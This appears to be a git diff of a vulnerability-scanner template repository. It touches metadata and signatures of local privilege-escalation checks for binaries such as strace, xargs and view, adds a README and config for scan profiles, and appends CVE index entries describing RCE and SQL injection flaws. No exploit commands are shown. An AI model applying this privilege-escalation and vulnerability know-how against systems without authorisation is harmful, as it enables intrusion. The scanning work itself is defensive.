metadata:
|
||||||
max-request: 4
|
|
||||||
verified: true
|
verified: true
|
||||||
|
max-request: 4
|
||||||
tags: code,linux,node,privesc,local
|
tags: code,linux,node,privesc,local
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
@ -53,4 +53,4 @@ code:
|
||||||
- 'contains(code_3_response, "root")'
|
- 'contains(code_3_response, "root")'
|
||||||
- 'contains(code_4_response, "root")'
|
- 'contains(code_4_response, "root")'
|
||||||
condition: or
|
condition: or
|
||||||
# digest: 4b0a00483046022100e32f25ba4a83d9d265aa187532f0090ba2fdf1beb89235113b4caeed36413ac30221008ecd529618da3ad2ed65e939b4233529614a005b87fd760bbeeb95de2e78746f:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a00483046022100c2fb7e0f1c8874aa30b7cbf614269bbd607e7679a738d4e4b6e6d5cafdf8faa1022100af88ace2a97d251334aeefafdfbd07471443304b4505d49f1edf432f53b5e43a:922c64590222798bb761d5b6d8e72950
|
|
@ -9,8 +9,8 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://gtfobins.github.io/gtfobins/rc/
|
- https://gtfobins.github.io/gtfobins/rc/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 3
|
|
||||||
verified: true
|
verified: true
|
||||||
|
max-request: 3
|
||||||
tags: code,linux,rc,privesc,local
|
tags: code,linux,rc,privesc,local
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
@ -46,4 +46,4 @@ code:
|
||||||
- 'contains(code_2_response, "root")'
|
- 'contains(code_2_response, "root")'
|
||||||
- 'contains(code_3_response, "root")'
|
- 'contains(code_3_response, "root")'
|
||||||
condition: or
|
condition: or
|
||||||
# digest: 4a0a004730450220665e08a8d241b76abc6c9f908b6c953eeebccc153af1c165958c388f1a57c3eb02210091d8e2364f4c48b2fd9d8b64222760ce398677386e5d185fc86425ea5ed10527:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502202a315bdc26f4d35efa4a6f698d5324b05e6f7d849772f27996dd0e04ac0edd5b022100cb3566b03c81b4ced70cb1bf221db42da3f9262c3ce4790664bc215a0b623abf:922c64590222798bb761d5b6d8e72950
|
|
@ -8,8 +8,8 @@ info:
|
||||||
The run-parts command in Linux is used to run all the executable files in a directory. It is commonly used for running scripts or commands located in a specific directory, such as system maintenance scripts in /etc/cron.daily. The run-parts command provides a convenient way to execute multiple scripts or commands in a batch manner.
|
The run-parts command in Linux is used to run all the executable files in a directory. It is commonly used for running scripts or commands located in a specific directory, such as system maintenance scripts in /etc/cron.daily. The run-parts command provides a convenient way to execute multiple scripts or commands in a batch manner.
|
||||||
reference: https://gtfobins.github.io/gtfobins/run-parts/
|
reference: https://gtfobins.github.io/gtfobins/run-parts/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 3
|
|
||||||
verified: true
|
verified: true
|
||||||
|
max-request: 3
|
||||||
tags: code,linux,run-parts,privesc,local
|
tags: code,linux,run-parts,privesc,local
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
@ -45,4 +45,4 @@ code:
|
||||||
- 'contains(code_2_response, "root")'
|
- 'contains(code_2_response, "root")'
|
||||||
- 'contains(code_3_response, "root")'
|
- 'contains(code_3_response, "root")'
|
||||||
condition: or
|
condition: or
|
||||||
# digest: 490a00463044022055bdbe38258f303b3247dcaaec655d2aca77ff0d5e3d83a8e763840384618a7c02204591a5abce03bc68b647b84a4a4fd59da6d3713256d3494aadc43cf2076778dd:922c64590222798bb761d5b6d8e72950
|
# digest: 490a00463044022058411677d700beae571edc83b5da8ff31eaa193dac73ba1515a220842ccabc8d0220151cca60c8ad28b2934984be7d6a187d3dd02ee9cac9a5cc3cd0af97273c6bca:922c64590222798bb761d5b6d8e72950
|
|
@ -9,8 +9,8 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://gtfobins.github.io/gtfobins/strace/
|
- https://gtfobins.github.io/gtfobins/strace/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 3
|
|
||||||
verified: true
|
verified: true
|
||||||
|
max-request: 3
|
||||||
tags: code,linux,strace,privesc,local
|
tags: code,linux,strace,privesc,local
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
@ -46,4 +46,4 @@ code:
|
||||||
- 'contains(code_2_response, "root")'
|
- 'contains(code_2_response, "root")'
|
||||||
- 'contains(code_3_response, "root")'
|
- 'contains(code_3_response, "root")'
|
||||||
condition: or
|
condition: or
|
||||||
# digest: 4a0a004730450221008a56962d3e0bfec8153fae52f4693ee5b8065098d3b7c5e16b5c2f481dcaaeb8022077e7fc1be8079fde76cbf09b10718038a4e013725c9955a91d5b024d02bdd27f:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502202b121064fdd29dfb40970b3956fcfb830cc7150f895b56913870f21c1f2f5e85022100fd214757ef5ac44a07cfc6fcdcf6da1fe59cd2b44f98829f01fc6af0c58045d8:922c64590222798bb761d5b6d8e72950
|
|
@ -9,8 +9,8 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://gtfobins.github.io/gtfobins/torify/
|
- https://gtfobins.github.io/gtfobins/torify/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 3
|
|
||||||
verified: true
|
verified: true
|
||||||
|
max-request: 3
|
||||||
tags: code,linux,torify,privesc,local
|
tags: code,linux,torify,privesc,local
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
@ -46,4 +46,4 @@ code:
|
||||||
- 'contains(code_2_response, "root")'
|
- 'contains(code_2_response, "root")'
|
||||||
- 'contains(code_3_response, "root")'
|
- 'contains(code_3_response, "root")'
|
||||||
condition: or
|
condition: or
|
||||||
# digest: 4a0a00473045022100fe967badaa42178c43d6c5f965ebd2205cd5636ddceeece364aedd793b317d1902207ad0bc797b16421928d1ec9016ba53809758b9f7603effab908a27decbc3cc74:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a004830460221008ca7aa24f7f8fa13b8d43c96981d8fd78a382752f6e2c69dfab164443972b747022100d307d8b9c2054d4731db696fc13198afed46d5b1215a6899b56533661240fc91:922c64590222798bb761d5b6d8e72950
|
|
@ -9,8 +9,8 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://gtfobins.github.io/gtfobins/view/
|
- https://gtfobins.github.io/gtfobins/view/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 3
|
|
||||||
verified: true
|
verified: true
|
||||||
|
max-request: 3
|
||||||
tags: code,linux,view,privesc,local
|
tags: code,linux,view,privesc,local
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
@ -46,4 +46,4 @@ code:
|
||||||
- 'contains(code_2_response, "root")'
|
- 'contains(code_2_response, "root")'
|
||||||
- 'contains(code_3_response, "root")'
|
- 'contains(code_3_response, "root")'
|
||||||
condition: or
|
condition: or
|
||||||
# digest: 490a0046304402207dc9a1ca06fcde2705d1a72ee2f792eff2f81f5d00def77fa54eec5d7717c19e02200c984a4f0d0cf94baa16c355ab52265f3dd281cac5bdd92f8ef9242efc087166:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100ed64ed48009962a92006b2ce803d0c5189e91ced727a841bc8c31e5d98d1a9b5022009f19b7df531fecde9b1303555d1ec29ba63a49ca1c439b6f48f46552d2d4bb4:922c64590222798bb761d5b6d8e72950
|
|
@ -9,8 +9,8 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://gtfobins.github.io/gtfobins/xargs/
|
- https://gtfobins.github.io/gtfobins/xargs/
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 3
|
|
||||||
verified: true
|
verified: true
|
||||||
|
max-request: 3
|
||||||
tags: code,linux,xargs,privesc,local
|
tags: code,linux,xargs,privesc,local
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
@ -46,4 +46,4 @@ code:
|
||||||
- 'contains(code_2_response, "root")'
|
- 'contains(code_2_response, "root")'
|
||||||
- 'contains(code_3_response, "root")'
|
- 'contains(code_3_response, "root")'
|
||||||
condition: or
|
condition: or
|
||||||
# digest: 490a0046304402205fac35cdd5142e3afd382d38b77be0b7105cfc23884e7ac5cbba8aa91cfc2bb002202b6c7ebae29c5c300052a85a39f3e30b71788d590bc40b797c1ee96c1f00f267:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022052f887093022e061b40da1eae5a8b4aa8a5f267dfd5f22db005a9076db73cc9a02210093f126e5d0229cf686f3c547dc3466e89afb2a7bf57bbeb790acf65376fcd047:922c64590222798bb761d5b6d8e72950
|
|
@ -7,8 +7,8 @@ info:
|
||||||
reference:
|
reference:
|
||||||
- https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-shadow
|
- https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-shadow
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 2
|
|
||||||
verified: true
|
verified: true
|
||||||
|
max-request: 2
|
||||||
tags: code,linux,privesc,local
|
tags: code,linux,privesc,local
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
@ -42,4 +42,4 @@ code:
|
||||||
words:
|
words:
|
||||||
- "Not readable and not writable"
|
- "Not readable and not writable"
|
||||||
negative: true
|
negative: true
|
||||||
# digest: 490a004630440220516036fa8622068621421ac043a6fb20b6551a6ca3d7851726474cfff7e4d9f902205a1a9ce09b5827f39e2311e6716793a917e29383f5e4d4a4b9a56925afa68e61:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402206152b0b3fe7a164b5583cb921d799f47fdcf9f30da2c32cbbb7248aa7068a13102200b3f49d97a93659dc9f1b56c518921e7e3597478d55eddb1cfc6a76dd45cb968:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,39 @@
|
||||||
|
## About
|
||||||
|
|
||||||
|
This directory hosts Nuclei configuration profiles specifically designed for various use cases, including Bug Bounty, OSINT, and Compliance. The centerpiece of these configurations is the `recommended.yml` file, which offers a handpicked selection of templates that are both efficient and relevant for the majority of scanning scenarios. This curated approach is intended to provide a more focused scanning experience, reducing the occurrence of irrelevant results that often accompany broader scans.
|
||||||
|
|
||||||
|
## Usage
|
||||||
|
|
||||||
|
The Nuclei configuration profiles are straightforward to integrate into your existing scanning workflows. Below are guidelines on how to utilize the `recommended.yml` configuration for a streamlined scanning process, as well as instructions for customizing your scans to fit specific needs.
|
||||||
|
|
||||||
|
### Using the Recommended Configuration
|
||||||
|
|
||||||
|
To execute a scan with the `recommended.yml` configuration, which has been optimized for general use to yield efficient and relevant results, use the following command:
|
||||||
|
|
||||||
|
```
|
||||||
|
nuclei -config ~/nuclei-templates/config/recommended.yml
|
||||||
|
```
|
||||||
|
|
||||||
|
## Customizing Your Scanning Configuration
|
||||||
|
If you have specific requirements or wish to modify the focus of your scans, you can create a custom configuration file based on the structure of recommended.yml. Adjust the template selections to fit your targeted scanning objectives. Once your configuration is set, run Nuclei using your custom file with the command:
|
||||||
|
|
||||||
|
```
|
||||||
|
nuclei -config your-custom-config.yml
|
||||||
|
```
|
||||||
|
|
||||||
|
## Examples
|
||||||
|
|
||||||
|
Here are examples of how to run scans for specific scenarios:
|
||||||
|
|
||||||
|
#### Running Local Privilege Escalation Checks
|
||||||
|
For targeting local privilege escalation vulnerabilities, utilize the dedicated config as follows:
|
||||||
|
|
||||||
|
```
|
||||||
|
nuclei -config ~/nuclei-templates/config/privilege-escalation.yml
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Config Focusing on OSINT
|
||||||
|
|
||||||
|
```
|
||||||
|
nuclei -config ~/nuclei-templates/config/osint.yml
|
||||||
|
```
|
|
@ -0,0 +1,7 @@
|
||||||
|
code: true
|
||||||
|
|
||||||
|
tags:
|
||||||
|
- privesc
|
||||||
|
|
||||||
|
include-tags:
|
||||||
|
- local
|
27
cves.json
27
cves.json
|
@ -265,6 +265,7 @@
|
||||||
{"ID":"CVE-2015-1427","Info":{"Name":"ElasticSearch - Remote Code Execution","Severity":"high","Description":"ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1427.yaml"}
|
{"ID":"CVE-2015-1427","Info":{"Name":"ElasticSearch - Remote Code Execution","Severity":"high","Description":"ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1427.yaml"}
|
||||||
{"ID":"CVE-2015-1503","Info":{"Name":"IceWarp Mail Server \u003c11.1.1 - Directory Traversal","Severity":"high","Description":"IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1503.yaml"}
|
{"ID":"CVE-2015-1503","Info":{"Name":"IceWarp Mail Server \u003c11.1.1 - Directory Traversal","Severity":"high","Description":"IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1503.yaml"}
|
||||||
{"ID":"CVE-2015-1579","Info":{"Name":"WordPress Slider Revolution - Local File Disclosure","Severity":"medium","Description":"Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-1579.yaml"}
|
{"ID":"CVE-2015-1579","Info":{"Name":"WordPress Slider Revolution - Local File Disclosure","Severity":"medium","Description":"Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-1579.yaml"}
|
||||||
|
{"ID":"CVE-2015-1635","Info":{"Name":"Microsoft Windows 'HTTP.sys' - Remote Code Execution","Severity":"critical","Description":"HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka \"HTTP.sys Remote Code Execution Vulnerability.\"\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2015/CVE-2015-1635.yaml"}
|
||||||
{"ID":"CVE-2015-1880","Info":{"Name":"Fortinet FortiOS \u003c=5.2.3 - Cross-Site Scripting","Severity":"medium","Description":"Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-1880.yaml"}
|
{"ID":"CVE-2015-1880","Info":{"Name":"Fortinet FortiOS \u003c=5.2.3 - Cross-Site Scripting","Severity":"medium","Description":"Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-1880.yaml"}
|
||||||
{"ID":"CVE-2015-20067","Info":{"Name":"WP Attachment Export \u003c 0.2.4 - Unrestricted File Download","Severity":"high","Description":"The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress\npowered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-20067.yaml"}
|
{"ID":"CVE-2015-20067","Info":{"Name":"WP Attachment Export \u003c 0.2.4 - Unrestricted File Download","Severity":"high","Description":"The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress\npowered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-20067.yaml"}
|
||||||
{"ID":"CVE-2015-2067","Info":{"Name":"Magento Server MAGMI - Directory Traversal","Severity":"medium","Description":"Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2067.yaml"}
|
{"ID":"CVE-2015-2067","Info":{"Name":"Magento Server MAGMI - Directory Traversal","Severity":"medium","Description":"Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2067.yaml"}
|
||||||
|
@ -1151,6 +1152,7 @@
|
||||||
{"ID":"CVE-2021-24409","Info":{"Name":"Prismatic \u003c 2.8 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24409.yaml"}
|
{"ID":"CVE-2021-24409","Info":{"Name":"Prismatic \u003c 2.8 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24409.yaml"}
|
||||||
{"ID":"CVE-2021-24435","Info":{"Name":"WordPress Titan Framework plugin \u003c= 1.12.1 - Cross-Site Scripting","Severity":"medium","Description":"The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24435.yaml"}
|
{"ID":"CVE-2021-24435","Info":{"Name":"WordPress Titan Framework plugin \u003c= 1.12.1 - Cross-Site Scripting","Severity":"medium","Description":"The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24435.yaml"}
|
||||||
{"ID":"CVE-2021-24436","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.4 is susceptible to cross-site scripting within the extension parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This can allow an attacker to convince an authenticated admin into clicking a link to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24436.yaml"}
|
{"ID":"CVE-2021-24436","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.4 is susceptible to cross-site scripting within the extension parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This can allow an attacker to convince an authenticated admin into clicking a link to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24436.yaml"}
|
||||||
|
{"ID":"CVE-2021-24442","Info":{"Name":"Wordpress Polls Widget \u003c 1.5.3 - SQL Injection","Severity":"critical","Description":"The Poll, Survey, Questionnaire and Voting system WordPress plugin before 1.5.3 did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24442.yaml"}
|
||||||
{"ID":"CVE-2021-24452","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.5 is susceptible to cross-site scripting via the extension parameter in the Extensions dashboard, when the setting 'Anonymously track usage to improve product quality' is enabled. The parameter is output in a JavaScript context without proper escaping. This can allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24452.yaml"}
|
{"ID":"CVE-2021-24452","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.5 is susceptible to cross-site scripting via the extension parameter in the Extensions dashboard, when the setting 'Anonymously track usage to improve product quality' is enabled. The parameter is output in a JavaScript context without proper escaping. This can allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24452.yaml"}
|
||||||
{"ID":"CVE-2021-24472","Info":{"Name":"Onair2 \u003c 3.9.9.2 \u0026 KenthaRadio \u003c 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","Severity":"critical","Description":"Onair2 \u003c 3.9.9.2 and KenthaRadio \u003c 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24472.yaml"}
|
{"ID":"CVE-2021-24472","Info":{"Name":"Onair2 \u003c 3.9.9.2 \u0026 KenthaRadio \u003c 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","Severity":"critical","Description":"Onair2 \u003c 3.9.9.2 and KenthaRadio \u003c 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24472.yaml"}
|
||||||
{"ID":"CVE-2021-24488","Info":{"Name":"WordPress Post Grid \u003c2.1.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Post Grid plugin before 2.1.8 contains a reflected cross-site scripting vulnerability. The slider import search feature and tab parameter of thesettings are not properly sanitized before being output back in the pages,","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24488.yaml"}
|
{"ID":"CVE-2021-24488","Info":{"Name":"WordPress Post Grid \u003c2.1.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Post Grid plugin before 2.1.8 contains a reflected cross-site scripting vulnerability. The slider import search feature and tab parameter of thesettings are not properly sanitized before being output back in the pages,","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24488.yaml"}
|
||||||
|
@ -1165,10 +1167,11 @@
|
||||||
{"ID":"CVE-2021-24731","Info":{"Name":"Pie Register \u003c 3.7.1.6 - SQL Injection","Severity":"critical","Description":"The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.7.1.6 does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24731.yaml"}
|
{"ID":"CVE-2021-24731","Info":{"Name":"Pie Register \u003c 3.7.1.6 - SQL Injection","Severity":"critical","Description":"The Registration Forms User profile, Content Restriction, Spam Protection, Payment Gateways, Invitation Codes WordPress plugin before 3.7.1.6 does not properly escape user data before using it in a SQL statement in the wp-json/pie/v1/login REST API endpoint, leading to an SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24731.yaml"}
|
||||||
{"ID":"CVE-2021-24746","Info":{"Name":"WordPress Sassy Social Share Plugin \u003c3.3.40 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin Sassy Social Share \u003c 3.3.40 contains a reflected cross-site scripting vulnerability.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24746.yaml"}
|
{"ID":"CVE-2021-24746","Info":{"Name":"WordPress Sassy Social Share Plugin \u003c3.3.40 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin Sassy Social Share \u003c 3.3.40 contains a reflected cross-site scripting vulnerability.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24746.yaml"}
|
||||||
{"ID":"CVE-2021-24750","Info":{"Name":"WordPress Visitor Statistics (Real Time Traffic) \u003c4.8 -SQL Injection","Severity":"high","Description":"WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2021/CVE-2021-24750.yaml"}
|
{"ID":"CVE-2021-24750","Info":{"Name":"WordPress Visitor Statistics (Real Time Traffic) \u003c4.8 -SQL Injection","Severity":"high","Description":"WordPress Visitor Statistics (Real Time Traffic) plugin before 4.8 does not properly sanitize and escape the refUrl in the refDetails AJAX action, which is available to any authenticated user. This could allow users with a role as low as subscriber to perform SQL injection attacks.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2021/CVE-2021-24750.yaml"}
|
||||||
{"ID":"CVE-2021-24762","Info":{"Name":"WordPress Perfect Survey\u003c1.5.2 - SQL Injection","Severity":"critical","Description":"Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24762.yaml"}
|
{"ID":"CVE-2021-24762","Info":{"Name":"WordPress Perfect Survey \u003c1.5.2 - SQL Injection","Severity":"critical","Description":"Perfect Survey WordPress plugin before 1.5.2 does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24762.yaml"}
|
||||||
{"ID":"CVE-2021-24791","Info":{"Name":"Header Footer Code Manager \u003c 1.1.14 - Admin+ SQL Injection","Severity":"high","Description":"The Header Footer Code Manager WordPress plugin before 1.1.14 does not validate and escape the \"orderby\" and \"order\" request parameters before using them in a SQL statement when viewing the Snippets admin dashboard, leading to SQL injections\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24791.yaml"}
|
{"ID":"CVE-2021-24791","Info":{"Name":"Header Footer Code Manager \u003c 1.1.14 - Admin+ SQL Injection","Severity":"high","Description":"The Header Footer Code Manager WordPress plugin before 1.1.14 does not validate and escape the \"orderby\" and \"order\" request parameters before using them in a SQL statement when viewing the Snippets admin dashboard, leading to SQL injections\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-24791.yaml"}
|
||||||
{"ID":"CVE-2021-24827","Info":{"Name":"WordPress Asgaros Forum \u003c1.15.13 - SQL Injection","Severity":"critical","Description":"WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24827.yaml"}
|
{"ID":"CVE-2021-24827","Info":{"Name":"WordPress Asgaros Forum \u003c1.15.13 - SQL Injection","Severity":"critical","Description":"WordPress Asgaros Forum plugin before 1.15.13 is susceptible to SQL injection. The plugin does not validate and escape user input when subscribing to a topic before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24827.yaml"}
|
||||||
{"ID":"CVE-2021-24838","Info":{"Name":"WordPress AnyComment \u003c0.3.5 - Open Redirect","Severity":"medium","Description":"WordPress AnyComment plugin before 0.3.5 contains an open redirect vulnerability via an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24838.yaml"}
|
{"ID":"CVE-2021-24838","Info":{"Name":"WordPress AnyComment \u003c0.3.5 - Open Redirect","Severity":"medium","Description":"WordPress AnyComment plugin before 0.3.5 contains an open redirect vulnerability via an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24838.yaml"}
|
||||||
|
{"ID":"CVE-2021-24849","Info":{"Name":"WCFM WooCommerce Multivendor Marketplace \u003c 3.4.12 - SQL Injection","Severity":"critical","Description":"The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24849.yaml"}
|
||||||
